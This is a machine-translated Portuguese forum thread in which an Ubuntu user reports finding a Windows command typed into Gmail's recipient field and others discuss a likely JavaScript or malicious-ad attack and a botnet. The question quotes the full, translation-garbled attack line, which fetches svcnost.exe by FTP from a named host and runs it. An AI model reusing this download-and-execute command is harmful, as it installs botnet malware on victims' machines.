Como identificar se meu computador Linux foi hackeado?

Meu PC doméstico geralmente está ligado, mas o monitor está desligado. Esta noite cheguei em casa do trabalho e descobri o que parece ser uma tentativa de invasão: no meu navegador, meu Gmail estava aberto (era eu), mas estava no modo de composição com o seguinte no TOcampo:

md / c echo open cCTeamFtp.yi.org 21 >> usuário de ik e eco ccteam10 765824 >> binário de ik e eco >> binário de ik e eco >> obtenha svcnost.exe >> ik e eco bye >> ik e eco bye >> ik e ftp -n -v -s: ik e del ik & svcnost.exe & exit echo Você pertence

Parece-me o código de linha de comando do Windows e o mdinício do código combinado ao fato de o Gmail estar no modo de composição torna evidente que alguém tentou executar um cmdcomando. Acho que tive sorte de não executar o Windows neste PC, mas tenho outros que o fazem. É a primeira vez que algo assim acontece comigo. Eu não sou um guru do Linux e não estava executando nenhum outro programa além do Firefox na época.

Tenho certeza absoluta de que não escrevi isso e ninguém mais estava fisicamente no meu computador. Além disso, recentemente mudei minha senha do Google (e todas as minhas outras senhas) para algo assim, vMA8ogd7bvpara que eu não ache que alguém tenha invadido minha conta do Google.

O que acabou de acontecer? Como alguém pressiona as teclas do meu computador quando não é a antiga máquina Windows da avó que executa malware há anos, mas uma recente instalação recente do Ubuntu?

Atualização:
Deixe-me abordar alguns dos pontos e perguntas:

• Estou na Áustria, no campo. Meu roteador WLAN executa o WPA2 / PSK e uma senha de segurança média que não está no dicionário; teria que ter força bruta e a menos de 50 metros daqui; não é provável que tenha sido hackeado.
• Estou usando um teclado com fio USB, então é muito improvável que alguém possa estar ao alcance para invadir.
• Eu não estava usando meu computador na época; só estava ocioso em casa enquanto eu estava no trabalho. É um PC nettop montado em monitor, por isso raramente o desligo.
• A máquina tem apenas dois meses, apenas roda o Ubuntu e não estou usando software estranho ou visitando sites estranhos. É principalmente Stack Exchange, Gmail e jornais. Sem jogos. O Ubuntu está definido para se manter atualizado.
• Não conheço nenhum serviço VNC em execução; Certamente não instalei ou habilitei um. Também não iniciei outros servidores. Não tenho certeza se algum está sendo executado no Ubuntu por padrão?
• Conheço todos os endereços IP na atividade da conta do Gmail. Tenho certeza de que o Google não era uma entrada.
• Encontrei um visualizador de arquivos de log , mas não sei o que procurar. Socorro?

O que realmente quero saber é, e o que realmente me faz sentir inseguro, é: como alguém da Internet pode gerar pressionamentos de tecla na minha máquina? Como posso evitar isso sem ser totalmente estúpido? Eu não sou um geek do Linux, sou um pai que mexe no Windows há mais de 20 anos e está cansado disso. E em todos os mais de 18 anos em que estou online, nunca vi pessoalmente nenhuma tentativa de hack, então isso é novo para mim.

Duvido que você tenha algo com que se preocupar. Provavelmente, foi um ataque de JavaScript que tentou fazer uma unidade por download . Se você está preocupado com isso, comece a usar os complementos NoScript e AdBlock Plus Firefox.

Mesmo visitando sites confiáveis, você não é seguro porque eles executam o código JavaScript de anunciantes de terceiros que podem ser maliciosos.

Peguei e executei em uma VM. Instalou o mirc e este é o log de status ... http://pastebin.com/Mn85akMk

É um ataque automatizado que está tentando fazer com que você faça o download do mIRC e entre em uma botnet que o transformará em um spambot ... Ele fez minha VM entrar e fazer uma conexão com vários endereços remotos diferentes, um dos quais autoemail-119.west320.com.

Ao executá-lo no Windows 7, tive que aceitar o prompt do UAC e permitir o acesso pelo firewall.

Parece haver toneladas de relatórios desse comando exato em outros fóruns, e alguém até diz que um arquivo torrent tentou executá-lo quando terminou o download ... Não tenho certeza de como isso seria possível.

Eu não usei isso sozinho, mas deve ser capaz de mostrar as conexões de rede atuais para que você possa ver se está conectado a algo fora da norma: http://netactview.sourceforge.net/download.html

Concordo com @ jb48394 que é provavelmente uma exploração de JavaScript, como tudo o mais nos dias de hoje.

O fato de ter tentado abrir uma cmdjanela (consulte o comentário de @ torbengb ) e executar um comando malicioso, em vez de apenas baixar o cavalo de Troia discretamente em segundo plano, sugere que ele explora alguma vulnerabilidade no Firefox, o que permite digitar as teclas, mas não execute o código.

Isso também explica por que essa exploração, que foi claramente escrita exclusivamente para Windows, também funcionaria no Linux: o Firefox executa o JavaScript da mesma maneira em todos os sistemas operacionais (pelo menos, ele tenta :)) . Se fosse causado por um estouro de buffer ou uma exploração semelhante destinada ao Windows, teria travado o programa.

Quanto à origem do código JavaScript - provavelmente um anúncio malicioso do Google (ciclo de anúncios no Gmail ao longo do dia) . Ele não iria ser a primeira vez .

Eu encontrei um ataque semelhante em outra máquina Linux. Parece que é algum tipo de comando FTP para Windows.

Isso não responde a toda a sua pergunta, mas no arquivo de log, procure por falhas nas tentativas de logon.

Se houver mais de cinco tentativas com falha no seu log, alguém tentou quebrar root. Se houver uma tentativa bem-sucedida de rootefetuar logon enquanto você estava fora do computador, MUDE SUA SENHA IMEDIATAMENTE !! Quero dizer AGORA! De preferência para algo alfanumérico e com cerca de 10 caracteres.

Com as mensagens que você recebeu (os echocomandos), isso realmente soa como um script imaturo infantil . Se fosse um hacker de verdade que sabia o que estava fazendo, você provavelmente ainda não saberia.

whois relatórios west320.com são de propriedade da Microsoft.

UPnP e Vino (Sistema -> Preferências -> Área de Trabalho Remota) combinados com uma senha fraca do Ubuntu?

Você usou repositórios fora do padrão?

A DEF CON realiza anualmente uma competição de Wi-Fi a que distância um ponto de acesso Wi-Fi pode ser alcançado - a última vez que ouvi dizer que era 250 milhas.

Se você realmente quer ter medo, veja as capturas de tela de um centro de comando e controle de uma botnet Zeus . Nenhuma máquina é segura, mas o Firefox no Linux é mais seguro que o resto. Melhor ainda, se você executar o SELinux .